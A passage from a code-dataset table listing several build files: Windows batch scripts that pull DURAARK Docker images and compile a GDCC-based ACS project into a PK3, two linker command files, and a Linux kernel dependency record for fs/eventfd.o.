code
stringlengths 3
1.03M
| repo_name
stringlengths 5
84
| path
stringlengths 4
233
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 3
1.03M
|
---|---|---|---|---|---|
"C:\Program Files\Docker Toolbox\docker-machine" env default --shell cmd > %TEMP%/set-docker-env.bat
call %TEMP%\set-docker-env.bat
del %TEMP%\set-docker-env.bat
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-sessions
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-metadata
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-sda
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-geometricenrichment
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-digitalpreservation
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/workbench-ui
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/api-gatekeeper
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-installer-windows
"C:\Program Files\Docker Toolbox\docker.exe" pull duraark/duraark-pointcloud-viewer
"C:\Program Files\Docker Toolbox\docker.exe" pull ubo/pc2bim
"C:\Program Files\Docker Toolbox\docker.exe" pull paulhilbert/e57-metadata
|
DURAARK/duraark-installer
|
windows-installer/scripts/update-duraark-system.bat
|
bat
|
mit
| 1,003 |
echo off
title PK3 Builder
cls
echo === Compiling Source Code ===
cd .\source
set CC=.\GDCC\gdcc-cc.exe
set AS=.\GDCC\gdcc-as.exe
set LD=.\GDCC\gdcc-ld.exe
set PROJECT_NAME=zkvn
set ZANDRONUM_COMPILE=0
if exist .\bin del .\bin /s /q >nul 2>&1
if not exist .\bin mkdir .\bin
if not exist .\bin\libgdcc mkdir .\bin\libgdcc
if not exist ..\pk3\acs mkdir ..\pk3\acs
if not exist .\inc mkdir .\inc
if not exist .\src mkdir .\src
echo ZDACS-asm.ir
%AS% --bc-target=ZDoom -o .\bin\libgdcc\ZDACS-asm.ir .\GDCC\lib\src\libGDCC\ZDACS\*.asm
echo c.ir
%CC% --bc-target=ZDoom -o .\bin\libgdcc\c.ir .\GDCC\lib\src\libGDCC\*.c
echo libGDCC.ir
%LD% -c --bc-target=ZDoom -o .\bin\libgdcc\libGDCC.ir .\bin\libgdcc\*.ir
echo libc.ir
%CC% --bc-target=ZDoom -o .\bin\libgdcc\libc.ir .\GDCC\lib\src\libc\*.c
echo %PROJECT_NAME%.ir
if %ZANDRONUM_COMPILE%==1 %CC% -iinc --bc-target=ZDoom -DZAN_ACS -o .\bin\%PROJECT_NAME%.ir .\src\*.c
if not %ZANDRONUM_COMPILE%==1 %CC% -iinc --bc-target=ZDoom -o .\bin\%PROJECT_NAME%.ir .\src\*.c
echo %PROJECT_NAME%.bin
%LD% --bc-target=ZDoom -o ..\pk3\acs\%PROJECT_NAME%.bin .\bin\*.ir .\bin\libgdcc\*.ir
echo Finished.
echo.
echo === Making PK3 ===
cd..
echo Creating %PROJECT_NAME%.pk3...
.\tools\7za.exe a -tzip %PROJECT_NAME%.pk3 .\pk3\* >nul
echo Finished.
echo.
echo === Finished ===
echo You should now see a "%PROJECT_NAME%.pk3" file in %cd%
echo Press any key to exit . . .
pause >nul
|
DaZombieKiller/zkvn
|
make_pk3.bat
|
bat
|
cc0-1.0
| 1,408 |
cmd_arch/arm/plat-bcmap/built-in.o := /opt/arm-2009q3/bin/arm-none-eabi-ld -EL -r -o arch/arm/plat-bcmap/built-in.o arch/arm/plat-bcmap/timer.o arch/arm/plat-bcmap/irq.o arch/arm/plat-bcmap/gpt.o arch/arm/plat-bcmap/sysfs.o arch/arm/plat-bcmap/gpio.o arch/arm/plat-bcmap/clock.o arch/arm/plat-bcmap/dma_drv.o arch/arm/plat-bcmap/osdal_os_service.o arch/arm/plat-bcmap/csl/built-in.o arch/arm/plat-bcmap/chal/built-in.o arch/arm/plat-bcmap/pwm_core.o arch/arm/plat-bcmap/bcm_rfkill.o arch/arm/plat-bcmap/bcm_cpufreq.o arch/arm/plat-bcmap/bcm_avs.o
|
sembre/kernel_totoro_update3
|
common/arch/arm/plat-bcmap/.built-in.o.cmd
|
bat
|
gpl-2.0
| 552 |
cmd_/home/yutingkao23/linuxcnc-add-hal-ethercat/src/timedelta.o := ld -m elf_i386 -r -o /home/yutingkao23/linuxcnc-add-hal-ethercat/src/timedelta.o /home/yutingkao23/linuxcnc-add-hal-ethercat/src/objects/hal/components/timedelta.o
|
CalvinHsu1223/LinuxCNC-EtherCAT-HAL-Driver
|
src/.timedelta.o.cmd
|
bat
|
gpl-2.0
| 234 |
cmd_fs/eventfd.o := arm-linux-gnueabi-gcc -Wp,-MD,fs/.eventfd.o.d -nostdinc -isystem /usr/lib/gcc/arm-linux-gnueabi/4.6/include -I/root/linux-jps/arch/arm/include -Iarch/arm/include/generated -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-rk30/include -Iarch/arm/plat-rk/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -Os -marm -fno-dwarf2-cfi-asm -mabi=aapcs-linux -mno-thumb-interwork -funwind-tables -D__LINUX_ARM_ARCH__=7 -march=armv7-a -msoft-float -Uarm -Wframe-larger-than=1024 -fno-stack-protector -Wno-unused-but-set-variable -fomit-frame-pointer -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fconserve-stack -DCC_HAVE_ASM_GOTO -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(eventfd)" -D"KBUILD_MODNAME=KBUILD_STR(eventfd)" -c -o fs/eventfd.o fs/eventfd.c
source_fs/eventfd.o := fs/eventfd.c
deps_fs/eventfd.o := \
include/linux/file.h \
include/linux/compiler.h \
$(wildcard include/config/sparse/rcu/pointer.h) \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/compiler-gcc.h \
$(wildcard include/config/arch/supports/optimized/inlining.h) \
$(wildcard include/config/optimize/inlining.h) \
include/linux/compiler-gcc4.h \
include/linux/types.h \
$(wildcard include/config/uid16.h) \
$(wildcard include/config/lbdaf.h) \
$(wildcard include/config/arch/dma/addr/t/64bit.h) \
$(wildcard include/config/phys/addr/t/64bit.h) \
$(wildcard include/config/64bit.h) \
/root/linux-jps/arch/arm/include/asm/types.h \
include/asm-generic/int-ll64.h \
/root/linux-jps/arch/arm/include/asm/bitsperlong.h \
include/asm-generic/bitsperlong.h \
include/linux/posix_types.h \
include/linux/stddef.h \
/root/linux-jps/arch/arm/include/asm/posix_types.h \
include/linux/poll.h \
/root/linux-jps/arch/arm/include/asm/poll.h \
include/asm-generic/poll.h \
include/linux/ktime.h \
$(wildcard include/config/ktime/scalar.h) \
include/linux/time.h \
$(wildcard include/config/arch/uses/gettimeoffset.h) \
include/linux/cache.h \
$(wildcard include/config/smp.h) \
$(wildcard include/config/arch/has/cache/line/size.h) \
include/linux/kernel.h \
$(wildcard include/config/preempt/voluntary.h) \
$(wildcard include/config/debug/spinlock/sleep.h) \
$(wildcard include/config/prove/locking.h) \
$(wildcard include/config/ring/buffer.h) \
$(wildcard include/config/tracing.h) \
$(wildcard include/config/numa.h) \
$(wildcard include/config/compaction.h) \
$(wildcard include/config/ftrace/mcount/record.h) \
/usr/lib/gcc/arm-linux-gnueabi/4.6/include/stdarg.h \
include/linux/linkage.h \
/root/linux-jps/arch/arm/include/asm/linkage.h \
include/linux/bitops.h \
/root/linux-jps/arch/arm/include/asm/bitops.h \
/root/linux-jps/arch/arm/include/asm/system.h \
$(wildcard include/config/function/graph/tracer.h) \
$(wildcard include/config/cpu/32v6k.h) \
$(wildcard include/config/cpu/xsc3.h) \
$(wildcard include/config/cpu/fa526.h) \
$(wildcard include/config/arch/has/barriers.h) \
$(wildcard include/config/arm/dma/mem/bufferable.h) \
$(wildcard include/config/cpu/sa1100.h) \
$(wildcard include/config/cpu/sa110.h) \
$(wildcard include/config/cpu/v6.h) \
include/linux/irqflags.h \
$(wildcard include/config/trace/irqflags.h) \
$(wildcard include/config/irqsoff/tracer.h) \
$(wildcard include/config/preempt/tracer.h) \
$(wildcard include/config/trace/irqflags/support.h) \
include/linux/typecheck.h \
/root/linux-jps/arch/arm/include/asm/irqflags.h \
/root/linux-jps/arch/arm/include/asm/ptrace.h \
$(wildcard include/config/cpu/endian/be8.h) \
$(wildcard include/config/arm/thumb.h) \
/root/linux-jps/arch/arm/include/asm/hwcap.h \
/root/linux-jps/arch/arm/include/asm/outercache.h \
$(wildcard include/config/outer/cache/sync.h) \
$(wildcard include/config/outer/cache.h) \
include/asm-generic/cmpxchg-local.h \
include/asm-generic/bitops/non-atomic.h \
include/asm-generic/bitops/fls64.h \
include/asm-generic/bitops/sched.h \
include/asm-generic/bitops/hweight.h \
include/asm-generic/bitops/arch_hweight.h \
include/asm-generic/bitops/const_hweight.h \
include/asm-generic/bitops/lock.h \
include/asm-generic/bitops/le.h \
/root/linux-jps/arch/arm/include/asm/byteorder.h \
include/linux/byteorder/little_endian.h \
include/linux/swab.h \
/root/linux-jps/arch/arm/include/asm/swab.h \
include/linux/byteorder/generic.h \
include/linux/log2.h \
$(wildcard include/config/arch/has/ilog2/u32.h) \
$(wildcard include/config/arch/has/ilog2/u64.h) \
include/linux/printk.h \
$(wildcard include/config/printk.h) \
$(wildcard include/config/dynamic/debug.h) \
include/linux/init.h \
$(wildcard include/config/modules.h) \
$(wildcard include/config/hotplug.h) \
include/linux/dynamic_debug.h \
/root/linux-jps/arch/arm/include/asm/bug.h \
$(wildcard include/config/bug.h) \
$(wildcard include/config/debug/bugverbose.h) \
include/asm-generic/bug.h \
$(wildcard include/config/generic/bug.h) \
$(wildcard include/config/generic/bug/relative/pointers.h) \
/root/linux-jps/arch/arm/include/asm/div64.h \
/root/linux-jps/arch/arm/include/asm/cache.h \
$(wildcard include/config/arm/l1/cache/shift.h) \
$(wildcard include/config/aeabi.h) \
include/linux/seqlock.h \
include/linux/spinlock.h \
$(wildcard include/config/debug/spinlock.h) \
$(wildcard include/config/generic/lockbreak.h) \
$(wildcard include/config/preempt.h) \
$(wildcard include/config/debug/lock/alloc.h) \
include/linux/preempt.h \
$(wildcard include/config/debug/preempt.h) \
$(wildcard include/config/preempt/notifiers.h) \
include/linux/thread_info.h \
$(wildcard include/config/compat.h) \
/root/linux-jps/arch/arm/include/asm/thread_info.h \
$(wildcard include/config/arm/thumbee.h) \
/root/linux-jps/arch/arm/include/asm/fpstate.h \
$(wildcard include/config/vfpv3.h) \
$(wildcard include/config/iwmmxt.h) \
/root/linux-jps/arch/arm/include/asm/domain.h \
$(wildcard include/config/io/36.h) \
$(wildcard include/config/cpu/use/domains.h) \
include/linux/list.h \
$(wildcard include/config/debug/list.h) \
include/linux/poison.h \
$(wildcard include/config/illegal/pointer/value.h) \
include/linux/const.h \
include/linux/stringify.h \
include/linux/bottom_half.h \
include/linux/spinlock_types.h \
/root/linux-jps/arch/arm/include/asm/spinlock_types.h \
include/linux/lockdep.h \
$(wildcard include/config/lockdep.h) \
$(wildcard include/config/lock/stat.h) \
$(wildcard include/config/prove/rcu.h) \
include/linux/rwlock_types.h \
/root/linux-jps/arch/arm/include/asm/spinlock.h \
$(wildcard include/config/thumb2/kernel.h) \
/root/linux-jps/arch/arm/include/asm/processor.h \
$(wildcard include/config/have/hw/breakpoint.h) \
$(wildcard include/config/mmu.h) \
$(wildcard include/config/arm/errata/754327.h) \
/root/linux-jps/arch/arm/include/asm/hw_breakpoint.h \
include/linux/rwlock.h \
include/linux/spinlock_api_smp.h \
$(wildcard include/config/inline/spin/lock.h) \
$(wildcard include/config/inline/spin/lock/bh.h) \
$(wildcard include/config/inline/spin/lock/irq.h) \
$(wildcard include/config/inline/spin/lock/irqsave.h) \
$(wildcard include/config/inline/spin/trylock.h) \
$(wildcard include/config/inline/spin/trylock/bh.h) \
$(wildcard include/config/inline/spin/unlock.h) \
$(wildcard include/config/inline/spin/unlock/bh.h) \
$(wildcard include/config/inline/spin/unlock/irq.h) \
$(wildcard include/config/inline/spin/unlock/irqrestore.h) \
include/linux/rwlock_api_smp.h \
$(wildcard include/config/inline/read/lock.h) \
$(wildcard include/config/inline/write/lock.h) \
$(wildcard include/config/inline/read/lock/bh.h) \
$(wildcard include/config/inline/write/lock/bh.h) \
$(wildcard include/config/inline/read/lock/irq.h) \
$(wildcard include/config/inline/write/lock/irq.h) \
$(wildcard include/config/inline/read/lock/irqsave.h) \
$(wildcard include/config/inline/write/lock/irqsave.h) \
$(wildcard include/config/inline/read/trylock.h) \
$(wildcard include/config/inline/write/trylock.h) \
$(wildcard include/config/inline/read/unlock.h) \
$(wildcard include/config/inline/write/unlock.h) \
$(wildcard include/config/inline/read/unlock/bh.h) \
$(wildcard include/config/inline/write/unlock/bh.h) \
$(wildcard include/config/inline/read/unlock/irq.h) \
$(wildcard include/config/inline/write/unlock/irq.h) \
$(wildcard include/config/inline/read/unlock/irqrestore.h) \
$(wildcard include/config/inline/write/unlock/irqrestore.h) \
/root/linux-jps/arch/arm/include/asm/atomic.h \
$(wildcard include/config/generic/atomic64.h) \
include/asm-generic/atomic-long.h \
include/linux/math64.h \
include/linux/jiffies.h \
include/linux/timex.h \
include/linux/param.h \
/root/linux-jps/arch/arm/include/asm/param.h \
$(wildcard include/config/hz.h) \
/root/linux-jps/arch/arm/include/asm/timex.h \
arch/arm/mach-rk30/include/mach/timex.h \
include/linux/wait.h \
/root/linux-jps/arch/arm/include/asm/current.h \
include/linux/string.h \
$(wildcard include/config/binary/printf.h) \
/root/linux-jps/arch/arm/include/asm/string.h \
include/linux/fs.h \
$(wildcard include/config/sysfs.h) \
$(wildcard include/config/security.h) \
$(wildcard include/config/quota.h) \
$(wildcard include/config/fsnotify.h) \
$(wildcard include/config/ima.h) \
$(wildcard include/config/fs/posix/acl.h) \
$(wildcard include/config/epoll.h) \
$(wildcard include/config/debug/writecount.h) \
$(wildcard include/config/file/locking.h) \
$(wildcard include/config/auditsyscall.h) \
$(wildcard include/config/block.h) \
$(wildcard include/config/fs/xip.h) \
$(wildcard include/config/migration.h) \
include/linux/limits.h \
include/linux/ioctl.h \
/root/linux-jps/arch/arm/include/asm/ioctl.h \
include/asm-generic/ioctl.h \
include/linux/blk_types.h \
$(wildcard include/config/blk/dev/integrity.h) \
include/linux/kdev_t.h \
include/linux/dcache.h \
include/linux/rculist.h \
include/linux/rcupdate.h \
$(wildcard include/config/rcu/torture/test.h) \
$(wildcard include/config/tree/rcu.h) \
$(wildcard include/config/tree/preempt/rcu.h) \
$(wildcard include/config/preempt/rcu.h) \
$(wildcard include/config/no/hz.h) \
$(wildcard include/config/tiny/rcu.h) \
$(wildcard include/config/tiny/preempt/rcu.h) \
$(wildcard include/config/debug/objects/rcu/head.h) \
$(wildcard include/config/preempt/rt.h) \
include/linux/threads.h \
$(wildcard include/config/nr/cpus.h) \
$(wildcard include/config/base/small.h) \
include/linux/cpumask.h \
$(wildcard include/config/cpumask/offstack.h) \
$(wildcard include/config/hotplug/cpu.h) \
$(wildcard include/config/debug/per/cpu/maps.h) \
$(wildcard include/config/disable/obsolete/cpumask/functions.h) \
include/linux/bitmap.h \
include/linux/completion.h \
include/linux/debugobjects.h \
$(wildcard include/config/debug/objects.h) \
$(wildcard include/config/debug/objects/free.h) \
include/linux/rcutree.h \
include/linux/rculist_bl.h \
include/linux/list_bl.h \
include/linux/bit_spinlock.h \
include/linux/path.h \
include/linux/stat.h \
/root/linux-jps/arch/arm/include/asm/stat.h \
include/linux/radix-tree.h \
include/linux/prio_tree.h \
include/linux/pid.h \
include/linux/mutex.h \
$(wildcard include/config/debug/mutexes.h) \
$(wildcard include/config/have/arch/mutex/cpu/relax.h) \
include/linux/capability.h \
include/linux/semaphore.h \
include/linux/fiemap.h \
include/linux/quota.h \
$(wildcard include/config/quota/netlink/interface.h) \
include/linux/errno.h \
/root/linux-jps/arch/arm/include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
include/linux/rwsem.h \
$(wildcard include/config/rwsem/generic/spinlock.h) \
include/linux/rwsem-spinlock.h \
include/linux/percpu_counter.h \
include/linux/smp.h \
$(wildcard include/config/use/generic/smp/helpers.h) \
/root/linux-jps/arch/arm/include/asm/smp.h \
include/linux/percpu.h \
$(wildcard include/config/need/per/cpu/embed/first/chunk.h) \
$(wildcard include/config/need/per/cpu/page/first/chunk.h) \
$(wildcard include/config/have/setup/per/cpu/area.h) \
include/linux/pfn.h \
/root/linux-jps/arch/arm/include/asm/percpu.h \
include/asm-generic/percpu.h \
include/linux/percpu-defs.h \
$(wildcard include/config/debug/force/weak/per/cpu.h) \
include/linux/dqblk_xfs.h \
include/linux/dqblk_v1.h \
include/linux/dqblk_v2.h \
include/linux/dqblk_qtree.h \
include/linux/nfs_fs_i.h \
include/linux/nfs.h \
include/linux/sunrpc/msg_prot.h \
include/linux/inet.h \
include/linux/fcntl.h \
/root/linux-jps/arch/arm/include/asm/fcntl.h \
include/asm-generic/fcntl.h \
include/linux/err.h \
include/linux/sysctl.h \
/root/linux-jps/arch/arm/include/asm/uaccess.h \
/root/linux-jps/arch/arm/include/asm/memory.h \
$(wildcard include/config/page/offset.h) \
$(wildcard include/config/highmem.h) \
$(wildcard include/config/dram/size.h) \
$(wildcard include/config/dram/base.h) \
$(wildcard include/config/have/tcm.h) \
$(wildcard include/config/arm/patch/phys/virt.h) \
$(wildcard include/config/arm/patch/phys/virt/16bit.h) \
arch/arm/mach-rk30/include/mach/memory.h \
include/linux/version.h \
arch/arm/mach-rk30/include/mach/io.h \
$(wildcard include/config/rk/debug/uart.h) \
/root/linux-jps/arch/arm/include/asm/sizes.h \
include/asm-generic/sizes.h \
include/asm-generic/memory_model.h \
$(wildcard include/config/flatmem.h) \
$(wildcard include/config/discontigmem.h) \
$(wildcard include/config/sparsemem/vmemmap.h) \
$(wildcard include/config/sparsemem.h) \
/root/linux-jps/arch/arm/include/asm/unified.h \
$(wildcard include/config/arm/asm/unified.h) \
include/linux/sched.h \
$(wildcard include/config/sched/debug.h) \
$(wildcard include/config/lockup/detector.h) \
$(wildcard include/config/detect/hung/task.h) \
$(wildcard include/config/core/dump/default/elf/headers.h) \
$(wildcard include/config/sched/autogroup.h) \
$(wildcard include/config/virt/cpu/accounting.h) \
$(wildcard include/config/bsd/process/acct.h) \
$(wildcard include/config/taskstats.h) \
$(wildcard include/config/audit.h) \
$(wildcard include/config/cgroups.h) \
$(wildcard include/config/inotify/user.h) \
$(wildcard include/config/fanotify.h) \
$(wildcard include/config/posix/mqueue.h) \
$(wildcard include/config/keys.h) \
$(wildcard include/config/perf/events.h) \
$(wildcard include/config/schedstats.h) \
$(wildcard include/config/task/delay/acct.h) \
$(wildcard include/config/fair/group/sched.h) \
$(wildcard include/config/rt/group/sched.h) \
$(wildcard include/config/blk/dev/io/trace.h) \
$(wildcard include/config/rcu/boost.h) \
$(wildcard include/config/compat/brk.h) \
$(wildcard include/config/cc/stackprotector.h) \
$(wildcard include/config/sysvipc.h) \
$(wildcard include/config/generic/hardirqs.h) \
$(wildcard include/config/rt/mutexes.h) \
$(wildcard include/config/task/xacct.h) \
$(wildcard include/config/cpusets.h) \
$(wildcard include/config/futex.h) \
$(wildcard include/config/fault/injection.h) \
$(wildcard include/config/latencytop.h) \
$(wildcard include/config/cgroup/mem/res/ctlr.h) \
$(wildcard include/config/have/unstable/sched/clock.h) \
$(wildcard include/config/irq/time/accounting.h) \
$(wildcard include/config/proc/fs.h) \
$(wildcard include/config/stack/growsup.h) \
$(wildcard include/config/debug/stack/usage.h) \
$(wildcard include/config/cgroup/sched.h) \
$(wildcard include/config/mm/owner.h) \
include/linux/rbtree.h \
include/linux/nodemask.h \
include/linux/numa.h \
$(wildcard include/config/nodes/shift.h) \
include/linux/mm_types.h \
$(wildcard include/config/split/ptlock/cpus.h) \
$(wildcard include/config/want/page/debug/flags.h) \
$(wildcard include/config/kmemcheck.h) \
$(wildcard include/config/aio.h) \
$(wildcard include/config/mmu/notifier.h) \
$(wildcard include/config/transparent/hugepage.h) \
include/linux/auxvec.h \
/root/linux-jps/arch/arm/include/asm/auxvec.h \
include/linux/page-debug-flags.h \
$(wildcard include/config/page/poisoning.h) \
$(wildcard include/config/page/debug/something/else.h) \
/root/linux-jps/arch/arm/include/asm/page.h \
$(wildcard include/config/cpu/copy/v3.h) \
$(wildcard include/config/cpu/copy/v4wt.h) \
$(wildcard include/config/cpu/copy/v4wb.h) \
$(wildcard include/config/cpu/copy/feroceon.h) \
$(wildcard include/config/cpu/copy/fa.h) \
$(wildcard include/config/cpu/xscale.h) \
$(wildcard include/config/cpu/copy/v6.h) \
$(wildcard include/config/have/arch/pfn/valid.h) \
/root/linux-jps/arch/arm/include/asm/glue.h \
include/asm-generic/getorder.h \
/root/linux-jps/arch/arm/include/asm/mmu.h \
$(wildcard include/config/cpu/has/asid.h) \
/root/linux-jps/arch/arm/include/asm/cputime.h \
include/asm-generic/cputime.h \
include/linux/sem.h \
include/linux/ipc.h \
/root/linux-jps/arch/arm/include/asm/ipcbuf.h \
/root/linux-jps/arch/arm/include/asm/sembuf.h \
include/linux/signal.h \
/root/linux-jps/arch/arm/include/asm/signal.h \
include/asm-generic/signal-defs.h \
/root/linux-jps/arch/arm/include/asm/sigcontext.h \
/root/linux-jps/arch/arm/include/asm/siginfo.h \
include/asm-generic/siginfo.h \
include/linux/topology.h \
$(wildcard include/config/sched/smt.h) \
$(wildcard include/config/sched/mc.h) \
$(wildcard include/config/sched/book.h) \
$(wildcard include/config/use/percpu/numa/node/id.h) \
$(wildcard include/config/have/memoryless/nodes.h) \
include/linux/mmzone.h \
$(wildcard include/config/force/max/zoneorder.h) \
$(wildcard include/config/zone/dma.h) \
$(wildcard include/config/zone/dma32.h) \
$(wildcard include/config/memory/hotplug.h) \
$(wildcard include/config/arch/populates/node/map.h) \
$(wildcard include/config/flat/node/mem/map.h) \
$(wildcard include/config/no/bootmem.h) \
$(wildcard include/config/have/memory/present.h) \
$(wildcard include/config/need/node/memmap/size.h) \
$(wildcard include/config/need/multiple/nodes.h) \
$(wildcard include/config/have/arch/early/pfn/to/nid.h) \
$(wildcard include/config/sparsemem/extreme.h) \
$(wildcard include/config/nodes/span/other/nodes.h) \
$(wildcard include/config/holes/in/zone.h) \
$(wildcard include/config/arch/has/holes/memorymodel.h) \
include/linux/pageblock-flags.h \
$(wildcard include/config/hugetlb/page.h) \
$(wildcard include/config/hugetlb/page/size/variable.h) \
include/generated/bounds.h \
include/linux/memory_hotplug.h \
$(wildcard include/config/memory/hotremove.h) \
$(wildcard include/config/have/arch/nodedata/extension.h) \
include/linux/notifier.h \
include/linux/srcu.h \
/root/linux-jps/arch/arm/include/asm/topology.h \
include/asm-generic/topology.h \
include/linux/proportions.h \
include/linux/seccomp.h \
$(wildcard include/config/seccomp.h) \
include/linux/rtmutex.h \
$(wildcard include/config/debug/rt/mutexes.h) \
include/linux/plist.h \
$(wildcard include/config/debug/pi/list.h) \
include/linux/resource.h \
/root/linux-jps/arch/arm/include/asm/resource.h \
include/asm-generic/resource.h \
include/linux/timer.h \
$(wildcard include/config/timer/stats.h) \
$(wildcard include/config/debug/objects/timers.h) \
include/linux/hrtimer.h \
$(wildcard include/config/high/res/timers.h) \
$(wildcard include/config/timerfd.h) \
include/linux/timerqueue.h \
include/linux/task_io_accounting.h \
$(wildcard include/config/task/io/accounting.h) \
include/linux/latencytop.h \
include/linux/cred.h \
$(wildcard include/config/debug/credentials.h) \
$(wildcard include/config/user/ns.h) \
include/linux/key.h \
$(wildcard include/config/sysctl.h) \
include/linux/selinux.h \
$(wildcard include/config/security/selinux.h) \
include/linux/aio.h \
include/linux/workqueue.h \
$(wildcard include/config/debug/objects/work.h) \
$(wildcard include/config/freezer.h) \
include/linux/aio_abi.h \
include/linux/uio.h \
include/linux/slab.h \
$(wildcard include/config/slab/debug.h) \
$(wildcard include/config/failslab.h) \
$(wildcard include/config/slub.h) \
$(wildcard include/config/slob.h) \
$(wildcard include/config/debug/slab.h) \
$(wildcard include/config/slab.h) \
include/linux/gfp.h \
include/linux/mmdebug.h \
$(wildcard include/config/debug/vm.h) \
$(wildcard include/config/debug/virtual.h) \
include/linux/slub_def.h \
$(wildcard include/config/slub/stats.h) \
$(wildcard include/config/slub/debug.h) \
include/linux/kobject.h \
include/linux/sysfs.h \
include/linux/kobject_ns.h \
include/linux/kref.h \
include/linux/kmemleak.h \
$(wildcard include/config/debug/kmemleak.h) \
include/linux/anon_inodes.h \
include/linux/syscalls.h \
$(wildcard include/config/ftrace/syscalls.h) \
$(wildcard include/config/ppc64.h) \
$(wildcard include/config/alpha.h) \
$(wildcard include/config/mips.h) \
$(wildcard include/config/have/syscall/wrappers.h) \
$(wildcard include/config/ia64.h) \
include/linux/unistd.h \
/root/linux-jps/arch/arm/include/asm/unistd.h \
$(wildcard include/config/oabi/compat.h) \
include/trace/syscall.h \
include/linux/tracepoint.h \
$(wildcard include/config/tracepoints.h) \
include/linux/jump_label.h \
$(wildcard include/config/jump/label.h) \
include/linux/ftrace_event.h \
include/linux/ring_buffer.h \
$(wildcard include/config/ring/buffer/allow/swap.h) \
include/linux/kmemcheck.h \
include/linux/mm.h \
$(wildcard include/config/ksm.h) \
$(wildcard include/config/debug/pagealloc.h) \
$(wildcard include/config/hibernation.h) \
$(wildcard include/config/hugetlbfs.h) \
include/linux/debug_locks.h \
$(wildcard include/config/debug/locking/api/selftests.h) \
include/linux/range.h \
/root/linux-jps/arch/arm/include/asm/pgtable.h \
$(wildcard include/config/highpte.h) \
include/asm-generic/4level-fixup.h \
/root/linux-jps/arch/arm/include/asm/proc-fns.h \
/root/linux-jps/arch/arm/include/asm/glue-proc.h \
$(wildcard include/config/cpu/arm610.h) \
$(wildcard include/config/cpu/arm7tdmi.h) \
$(wildcard include/config/cpu/arm710.h) \
$(wildcard include/config/cpu/arm720t.h) \
$(wildcard include/config/cpu/arm740t.h) \
$(wildcard include/config/cpu/arm9tdmi.h) \
$(wildcard include/config/cpu/arm920t.h) \
$(wildcard include/config/cpu/arm922t.h) \
$(wildcard include/config/cpu/arm925t.h) \
$(wildcard include/config/cpu/arm926t.h) \
$(wildcard include/config/cpu/arm940t.h) \
$(wildcard include/config/cpu/arm946e.h) \
$(wildcard include/config/cpu/arm1020.h) \
$(wildcard include/config/cpu/arm1020e.h) \
$(wildcard include/config/cpu/arm1022.h) \
$(wildcard include/config/cpu/arm1026.h) \
$(wildcard include/config/cpu/mohawk.h) \
$(wildcard include/config/cpu/feroceon.h) \
$(wildcard include/config/cpu/v6k.h) \
$(wildcard include/config/cpu/v7.h) \
arch/arm/mach-rk30/include/mach/vmalloc.h \
/root/linux-jps/arch/arm/include/asm/pgtable-hwdef.h \
include/asm-generic/pgtable.h \
include/linux/page-flags.h \
$(wildcard include/config/pageflags/extended.h) \
$(wildcard include/config/arch/uses/pg/uncached.h) \
$(wildcard include/config/memory/failure.h) \
$(wildcard include/config/swap.h) \
$(wildcard include/config/s390.h) \
include/linux/huge_mm.h \
include/linux/vmstat.h \
$(wildcard include/config/vm/event/counters.h) \
include/linux/vm_event_item.h \
include/linux/seq_file.h \
include/linux/trace_seq.h \
include/linux/hardirq.h \
include/linux/ftrace_irq.h \
$(wildcard include/config/ftrace/nmi/enter.h) \
/root/linux-jps/arch/arm/include/asm/hardirq.h \
$(wildcard include/config/local/timers.h) \
/root/linux-jps/arch/arm/include/asm/irq.h \
arch/arm/mach-rk30/include/mach/irqs.h \
include/linux/irq_cpustat.h \
include/linux/perf_event.h \
$(wildcard include/config/perf/use/vmalloc.h) \
$(wildcard include/config/cgroup/perf.h) \
$(wildcard include/config/event/tracing.h) \
include/linux/cgroup.h \
include/linux/cgroupstats.h \
include/linux/taskstats.h \
include/linux/prio_heap.h \
include/linux/idr.h \
include/linux/cgroup_subsys.h \
$(wildcard include/config/cgroup/debug.h) \
$(wildcard include/config/cgroup/cpuacct.h) \
$(wildcard include/config/cgroup/device.h) \
$(wildcard include/config/cgroup/freezer.h) \
$(wildcard include/config/net/cls/cgroup.h) \
$(wildcard include/config/blk/cgroup.h) \
/root/linux-jps/arch/arm/include/asm/perf_event.h \
/root/linux-jps/arch/arm/include/asm/local64.h \
include/asm-generic/local64.h \
include/linux/pid_namespace.h \
$(wildcard include/config/pid/ns.h) \
include/linux/nsproxy.h \
include/linux/ftrace.h \
$(wildcard include/config/function/tracer.h) \
$(wildcard include/config/dynamic/ftrace.h) \
$(wildcard include/config/stack/tracer.h) \
$(wildcard include/config/frame/pointer.h) \
include/linux/trace_clock.h \
include/linux/kallsyms.h \
$(wildcard include/config/kallsyms.h) \
include/linux/module.h \
$(wildcard include/config/symbol/prefix.h) \
$(wildcard include/config/modversions.h) \
$(wildcard include/config/unused/symbols.h) \
$(wildcard include/config/module/unload.h) \
$(wildcard include/config/constructors.h) \
$(wildcard include/config/debug/set/module/ronx.h) \
include/linux/kmod.h \
include/linux/elf.h \
include/linux/elf-em.h \
/root/linux-jps/arch/arm/include/asm/elf.h \
/root/linux-jps/arch/arm/include/asm/user.h \
include/linux/moduleparam.h \
/root/linux-jps/arch/arm/include/asm/module.h \
$(wildcard include/config/arm/unwind.h) \
include/trace/events/module.h \
include/trace/define_trace.h \
/root/linux-jps/arch/arm/include/asm/ftrace.h \
$(wildcard include/config/old/mcount.h) \
include/linux/cpu.h \
$(wildcard include/config/arch/cpu/probe/release.h) \
$(wildcard include/config/pm/sleep/smp.h) \
include/linux/sysdev.h \
include/linux/pm.h \
